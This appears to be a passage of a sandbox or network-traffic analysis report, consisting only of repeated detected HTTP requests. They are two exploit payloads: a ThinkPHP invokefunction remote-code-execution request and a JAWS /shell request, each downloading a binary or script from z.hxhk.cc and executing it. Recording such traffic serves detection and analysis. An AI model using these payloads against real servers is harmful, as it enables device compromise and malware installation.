Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
